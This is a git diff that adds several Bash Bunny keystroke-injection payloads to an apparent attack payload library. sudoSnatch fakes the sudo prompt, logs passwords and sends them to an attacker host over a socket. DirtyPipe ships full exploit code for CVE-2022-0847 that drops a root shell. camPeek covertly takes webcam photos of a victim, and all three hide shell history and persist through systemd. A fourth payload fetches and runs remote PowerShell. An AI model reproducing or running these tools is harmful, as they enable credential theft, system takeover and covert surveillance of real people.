diff --git a/payloads/library/credentials/sudoSnatch/README.md b/payloads/library/credentials/sudoSnatch/README.md new file mode 100644 index 00000000..856ab92e --- /dev/null +++ b/payloads/library/credentials/sudoSnatch/README.md @@ -0,0 +1,48 @@ +## About: +* Title: sudoSnatch +* Description: sudoSnatch grabs plain text passwords remotely/locally. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Credentials +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, Storage + +## sudoSnatch: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally. + +### Features: +* Plain text passwords. +* Detailed password logs. +* Persistent +* Autostart payload on boot. + +### Workflow: +* Injecting payload on target's system. +* Checks whether internet is connected to the target system. +* If internet is connected then it sends clear text passwords to attacker. + +### Changes to be made in payload.sh: +* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `10`. +* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `14`. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| payload.txt | /payloads/switch1/ | +| payload.sh | /payloads/ | +| shell | /payloads/library/sudoSnatch/ | +| systemMgr | /payloads/library/sudoSnatch/ | + +* Note: Create directory named `sudoSnatch` in `/payloads/library/` +### Usage: +1. Inject payload into target's system. +2. Start netcat listner on attacking system: + +* `nc -l -p ` use this command to fetch passwords. + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/credentials/sudoSnatch/payload.sh b/payloads/library/credentials/sudoSnatch/payload.sh new file mode 100644 index 00000000..a11c2654 --- /dev/null +++ b/payloads/library/credentials/sudoSnatch/payload.sh @@ -0,0 +1,23 @@ +#!/bin/bash +unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE +mkdir /var/tmp/.system +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +cp -r $mntt/payloads/library/sudoSnatch/systemMgr /var/tmp/.system/ +chmod +x /var/tmp/.system/systemMgr +touch /var/tmp/.system/sysLog +echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus +chmod +x /var/tmp/.system/systemBus +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot +chmod +x /var/tmp/.system/reboot +echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service +systemctl --user daemon-reload +systemctl --user enable --now systemBUS.service +systemctl --user start --now systemBUS.service +systemctl --user enable --now reboot.service +systemctl --user start --now reboot.service +cp -r $mntt/payloads/library/sudoSnatch/shell /tmp/ +chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell diff --git a/payloads/library/credentials/sudoSnatch/payload.txt b/payloads/library/credentials/sudoSnatch/payload.txt new file mode 100644 index 00000000..894b67c6 --- /dev/null +++ b/payloads/library/credentials/sudoSnatch/payload.txt @@ -0,0 +1,56 @@ +# Title: sudoSnatch +# Description: sudoSnatch grabs plain text passwords remotely/locally. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Credentials +# Target: Unix-like operating systems with systemd. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 1400 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 200 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh +Q ENTER +Q DELAY 5000 +Q STRING rm /tmp/payload.sh +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/credentials/sudoSnatch/shell b/payloads/library/credentials/sudoSnatch/shell new file mode 100644 index 00000000..eb95bf5d --- /dev/null +++ b/payloads/library/credentials/sudoSnatch/shell @@ -0,0 +1,12 @@ +#!/bin/bash +ls -a ~/ | grep 'zshrc' &> /dev/null +if [ $? = 0 ]; then + echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc + echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.zshrc +fi + +ls -a ~/ | grep 'bashrc' &> /dev/null +if [ $? = 0 ]; then + echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc + echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.bashrc +fi diff --git a/payloads/library/credentials/sudoSnatch/systemMgr b/payloads/library/credentials/sudoSnatch/systemMgr new file mode 100644 index 00000000..36c6b4ea --- /dev/null +++ b/payloads/library/credentials/sudoSnatch/systemMgr @@ -0,0 +1,5 @@ +#!/bin/bash +echo -n "[sudo] password for $(whoami):" +IFS="" read -s pass +echo -e "Timestamp=[$(date)] \t User=[$(whoami)] \t Password=[$pass]" >> /var/tmp/.system/sysLog +echo -e "\nSorry, try again." diff --git a/payloads/library/execution/DirtyPipe/README.md b/payloads/library/execution/DirtyPipe/README.md new file mode 100644 index 00000000..c115edfb --- /dev/null +++ b/payloads/library/execution/DirtyPipe/README.md @@ -0,0 +1,24 @@ +## About: +* Title: DirtyPipe +* Description: Exploit for a new Linux vulnerability known as 'Dirty Pipe(CVE-2022-0847)' allows local users to gain root privileges. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Execution +* Target: Linux operating systems. +* Attackmodes: HID, Storage + +## DirtyPipe: Exploit for a new Linux vulnerability known as 'Dirty Pipe(CVE-2022-0847)' allows local users to gain root privileges. The vulnerability is tracked as CVE-2022-0847 and allows a non-privileged user to inject and overwrite data in read-only files, including SUID processes that run as root. + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| payload.txt | /payloads/ | +| dirtypipe.c | /payloads/library/ | + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/DirtyPipe/dirtypipe.c b/payloads/library/execution/DirtyPipe/dirtypipe.c new file mode 100644 index 00000000..cd6295d6 --- /dev/null +++ b/payloads/library/execution/DirtyPipe/dirtypipe.c @@ -0,0 +1,181 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include + +#ifndef PAGE_SIZE +#define PAGE_SIZE 4096 +#endif + +// small (linux x86_64) ELF file matroshka doll that does; +// fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC); +// write(fd, elfcode, elfcode_len) +// chmod("/tmp/sh", 04755) +// close(fd); +// exit(0); +// +// the dropped ELF simply does: +// setuid(0); +// setgid(0); +// execve("/bin/sh", ["/bin/sh", NULL], [NULL]); +unsigned char elfcode[] = { + /*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, + 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02, + 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, + 0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, + 0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f, + 0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, + 0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00, + 0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, + 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d, + 0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, + 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, + 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, + 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, + 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69, + 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a, + 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00, + 0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0, + 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, + 0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00 +}; + +/** + * Create a pipe where all "bufs" on the pipe_inode_info ring have the + * PIPE_BUF_FLAG_CAN_MERGE flag set. + */ +static void prepare_pipe(int p[2]) +{ + if (pipe(p)) abort(); + + const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ); + static char buffer[4096]; + + /* fill the pipe completely; each pipe_buffer will now have + the PIPE_BUF_FLAG_CAN_MERGE flag */ + for (unsigned r = pipe_size; r > 0;) { + unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; + write(p[1], buffer, n); + r -= n; + } + + /* drain the pipe, freeing all pipe_buffer instances (but + leaving the flags initialized) */ + for (unsigned r = pipe_size; r > 0;) { + unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; + read(p[0], buffer, n); + r -= n; + } + + /* the pipe is now empty, and if somebody adds a new + pipe_buffer without initializing its "flags", the buffer + will be mergeable */ +} + +int hax(char *filename, long offset, uint8_t *data, size_t len) { + /* open the input file and validate the specified offset */ + const int fd = open(filename, O_RDONLY); // yes, read-only! :-) + if (fd < 0) { + perror("open failed"); + return -1; + } + + struct stat st; + if (fstat(fd, &st)) { + perror("stat failed"); + return -1; + } + + /* create the pipe with all flags initialized with + PIPE_BUF_FLAG_CAN_MERGE */ + int p[2]; + prepare_pipe(p); + + /* splice one byte from before the specified offset into the + pipe; this will add a reference to the page cache, but + since copy_page_to_iter_pipe() does not initialize the + "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */ + --offset; + ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0); + if (nbytes < 0) { + perror("splice failed"); + return -1; + } + if (nbytes == 0) { + fprintf(stderr, "short splice\n"); + return -1; + } + + /* the following write will not create a new pipe_buffer, but + will instead write into the page cache, because of the + PIPE_BUF_FLAG_CAN_MERGE flag */ + nbytes = write(p[1], data, len); + if (nbytes < 0) { + perror("write failed"); + return -1; + } + if ((size_t)nbytes < len) { + fprintf(stderr, "short write\n"); + return -1; + } + + close(fd); + + return 0; +} + +int main(int argc, char **argv) { + if (argc != 2) { + fprintf(stderr, "Usage: %s SUID\n", argv[0]); + return EXIT_FAILURE; + } + + char *path = argv[1]; + uint8_t *data = elfcode; + + int fd = open(path, O_RDONLY); + uint8_t *orig_bytes = malloc(sizeof(elfcode)); + lseek(fd, 1, SEEK_SET); + read(fd, orig_bytes, sizeof(elfcode)); + close(fd); + + printf("[+] hijacking suid binary..\n"); + if (hax(path, 1, elfcode, sizeof(elfcode)) != 0) { + printf("[~] failed\n"); + return EXIT_FAILURE; + } + + printf("[+] dropping suid shell..\n"); + system(path); + + printf("[+] restoring suid binary..\n"); + if (hax(path, 1, orig_bytes, sizeof(elfcode)) != 0) { + printf("[~] failed\n"); + return EXIT_FAILURE; + } + + printf("[+] popping root shell.. (dont forget to clean up /tmp/sh ;))\n"); + system("/tmp/sh"); + + return EXIT_SUCCESS; +} diff --git a/payloads/library/execution/DirtyPipe/payload.txt b/payloads/library/execution/DirtyPipe/payload.txt new file mode 100644 index 00000000..e432e46e --- /dev/null +++ b/payloads/library/execution/DirtyPipe/payload.txt @@ -0,0 +1,82 @@ +# Title: DirtyPipe +# Description: Exploit for a new Linux vulnerability known as 'Dirty Pipe(CVE-2022-0847)' allows local users to gain root privileges. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: Linux operating systems. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 100 +Q STRING HISTSIZE=0 +Q ENTER +Q DELAY 100 +Q STRING rm -f '$HISTFILE' +Q ENTER +Q DELAY 100 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering and executing exploit] +Q STRING cp -r '$mntt'/payloads/library/dirtypipe.c /tmp/ +Q ENTER +Q DELAY 100 +Q STRING gcc /tmp/dirtypipe.c -o /tmp/dirtypipe +Q ENTER +Q DELAY 1000 +Q STRING chmod +x /tmp/dirtypipe +Q ENTER +Q STRING /tmp/./dirtypipe /bin/bash +Q ENTER +Q DELAY 500 +Q STRING sudo su +Q ENTER +Q CTRL-ALT t +Q DELAY 500 +Q STRING rm /tmp/dirtypipe +Q ENTER +Q DELAY 100 +Q STRING rm /tmp/dirtypipe.c +Q ENTER +Q DELAY 200 + +# [Unmounting BashBunny] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 100 +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 100 +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/execution/camPeek/README.md b/payloads/library/execution/camPeek/README.md new file mode 100644 index 00000000..4c6863c5 --- /dev/null +++ b/payloads/library/execution/camPeek/README.md @@ -0,0 +1,55 @@ +## About: +* Title: camPeek +* Description: camPeek payload peeks through targets web cam and capture images and stores them in bunny. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Execution +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, Storage + +## CamPeek: camPeek payload is divided into two modules, First peeks through targets web cam and capture images and Second stores them in bunny. + +### Features: +* Robust Payload for capturing targets images. +* No additional dependencies required. +* Persistent. +* Autostart payload on boot. + +### Payload: +* Payload is divided into two modules: +1) Deployment: In this stage payload is deployed in targets system. +2) Exfiltration: Storing saved loot from targets system in bunny. + +### Payload Script's Workflow: +* Stop storing histroy. +* Grep bunny's mount point of bunny. +* Creating hidden directory in /var/tmp/..... for obfuscation. +* Copying ffmpeg and image capturing mechanism in target's system. +* Creating systemd service for persistance and triggering mechanism for autostart. + +### Changes to be made: +* Change time interval of capturing image, more the time interval target gets less suspicious, default time interval is 120 secs. Make changes in `systemBus` on line number `4`. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Note: +* Download pre compiled static build of ffmpeg from: https://github.com/drapl0n/temp/releases/download/ffmpeg/ffmpeg and move it in camPeek directory. +* Due to big size of binary, it is not provided in this repo. +* Craete directory name `camPeek` in `/loot/` for storing captured images. + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| switch1/payload.txt | /payloads/switch1/ | +| switch2/payload.txt | /payloads/switch2/ | +| camPeek/ | /payloads/libray/ | + +### Usage: +1. Deploy first payload during absence of target using `switch1`. +2. Execute second payload during absence of target to store captured images in bunny using `switch2`. + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/camPeek/camPeek/payload.sh b/payloads/library/execution/camPeek/camPeek/payload.sh new file mode 100644 index 00000000..3759ce12 --- /dev/null +++ b/payloads/library/execution/camPeek/camPeek/payload.sh @@ -0,0 +1,18 @@ +#!/bin/bash +unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE +mkdir /var/tmp/.system +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +cp -r $mntt/payloads/library/camPeek/ffmpeg /var/tmp/.system/ +chmod +x /var/tmp/.system/ffmpeg +mkdir /var/tmp/.system/sysLog +cp -r $mntt/payloads/library/camPeek/systemBus /var/tmp/.system/systemBus +chmod +x /var/tmp/.system/systemBus +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +systemctl --user daemon-reload +systemctl --user enable --now systemBUS.service +systemctl --user start --now systemBUS.service +cp -r $mntt/payloads/library/camPeek/shell /tmp/ +chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell diff --git a/payloads/library/execution/camPeek/camPeek/shell b/payloads/library/execution/camPeek/camPeek/shell new file mode 100644 index 00000000..2b46e3d3 --- /dev/null +++ b/payloads/library/execution/camPeek/camPeek/shell @@ -0,0 +1,12 @@ +#!/bin/bash +ls -a ~/ | grep 'zshrc' &> /dev/null +if [ $? = 0 ]; then + echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc + echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.zshrc +fi + +ls -a ~/ | grep 'bashrc' &> /dev/null +if [ $? = 0 ]; then + echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc + echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.bashrc +fi diff --git a/payloads/library/execution/camPeek/camPeek/systemBus b/payloads/library/execution/camPeek/camPeek/systemBus new file mode 100644 index 00000000..f23d223c --- /dev/null +++ b/payloads/library/execution/camPeek/camPeek/systemBus @@ -0,0 +1,5 @@ +while true; +do + /var/tmp/.system/./ffmpeg -f video4linux2 -i /dev/video0 -vframes 1 -video_size 640x480 /var/tmp/.system/sysLog/$(date +%Y%m%d-%H%M%S).png + sleep 120 +done diff --git a/payloads/library/execution/camPeek/switch1/payload.txt b/payloads/library/execution/camPeek/switch1/payload.txt new file mode 100644 index 00000000..c251c817 --- /dev/null +++ b/payloads/library/execution/camPeek/switch1/payload.txt @@ -0,0 +1,56 @@ +# Title: camPeek +# Description: camPeek payload peeks through targets web cam and capture images. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: GNU/Linux operating systems with systemd. +# Attackmodes: HID, Storage. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/library/camPeek/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh +Q ENTER +Q DELAY 12000 +Q STRING rm /tmp/payload.sh +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/execution/camPeek/switch2/payload.txt b/payloads/library/execution/camPeek/switch2/payload.txt new file mode 100644 index 00000000..b478df1f --- /dev/null +++ b/payloads/library/execution/camPeek/switch2/payload.txt @@ -0,0 +1,43 @@ +# Title: camPeek +# Description: camPeek payload's exfilteration module to move captured images to bunny. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: GNU/Linux operating systems with systemd. +# Attackmodes: HID, Storage. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +# create directory named camPeek in /loot/ +Q STRING mv /var/tmp/.system/sysLog/* '$mntt'/loot/camPeek/ \& +Q ENTER +Q STRING disown \&\& exit +Q ENTER diff --git a/payloads/library/general/Win_PoSH_RandomVid/payload.txt b/payloads/library/general/Win_PoSH_RandomVid/payload.txt new file mode 100644 index 00000000..1d2e874e --- /dev/null +++ b/payloads/library/general/Win_PoSH_RandomVid/payload.txt @@ -0,0 +1,33 @@ +#!/bin/bash +# Title: Random Video +# Description: Downloads a list of vids from YouTube. Then pick a random one then opens it. +# Author: Cribbit +# Version: 1.0 +# Category: General +# Target: Windows (Powershell 5.1+) +# Attackmodes: RNDIS_ETHERNET HID + +LED SETUP +ATTACKMODE RNDIS_ETHERNET HID + +GET SWITCH_POSITION +GET HOST_IP + + +cd /root/udisk/payloads/$SWITCH_POSITION/ + +# starting server +LED SPECIAL + +# disallow outgoing dns requests so server starts immediately +iptables -A OUTPUT -p udp --dport 53 -j DROP +python -m SimpleHTTPServer 80 & + +# wait until port is listening +while ! nc -z localhost 80; do sleep 0.2; done + +# attack commences +LED ATTACK +QUACK DELAY 300 +RUN WIN "powershell -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\"" +LED FINISH \ No newline at end of file diff --git a/payloads/library/general/Win_PoSH_RandomVid/readme.md b/payloads/library/general/Win_PoSH_RandomVid/readme.md new file mode 100644 index 00000000..7008f5fb --- /dev/null +++ b/payloads/library/general/Win_PoSH_RandomVid/readme.md @@ -0,0 +1,24 @@ +# Random Video +- Author: Cribbit +- Version: 1.0 +- Tested on: Windows 10 (Powershell 5.1+) +- Category: General +- Attackmode: HID & RNDIS_ETHERNET +- Extensions: Run + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Description +Downloads a list of Hak5 vids from YouTube (about 15 in the rss feed). + +Then pick one at random, then opens it in the browser. + +## Colours +| Status | Colour | Description | +| -------- | ----------------------------- | --------------------------- | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting Powershell script | +| FINISHED | Green blink followed by SOLID | Injection finished | \ No newline at end of file diff --git a/payloads/library/general/Win_PoSH_RandomVid/s b/payloads/library/general/Win_PoSH_RandomVid/s new file mode 100644 index 00000000..20ddb97b --- /dev/null +++ b/payloads/library/general/Win_PoSH_RandomVid/s @@ -0,0 +1,24 @@ +# Get the RSS feed for the Hak5 Channel +Write-Output "Connecting to youtube" +$Response = Invoke-WebRequest -Uri "https://www.youtube.com/feeds/videos.xml?channel_id=UC3s0BtrBJpwNDaflRSoiieQ" -UseBasicParsing -ContentType "application/xml" +Write-Output $Response.StatusCode +# See if it successful +If ($Response.StatusCode -eq "200") { + # set the XML + $Xml = [xml]$Response.Content + $Entries = @() + # Loop each entry creating an object + ForEach ($Entry in $Xml.feed.entry) { + $Entries += [PSCustomObject] @{ + 'Updated' = [datetime]$Entry.updated + 'Title' = $Entry.title + 'Link' = $Entry.Link.href + } + } + # Gets a random number + $int = (Get-Random -Maximum ($Entries.Count -1) -Minimum 0) + $Entry = $Entries[$int] + # Opens link + Start-Process $Entry.Link + Write-Output $Entry.Title +} \ No newline at end of file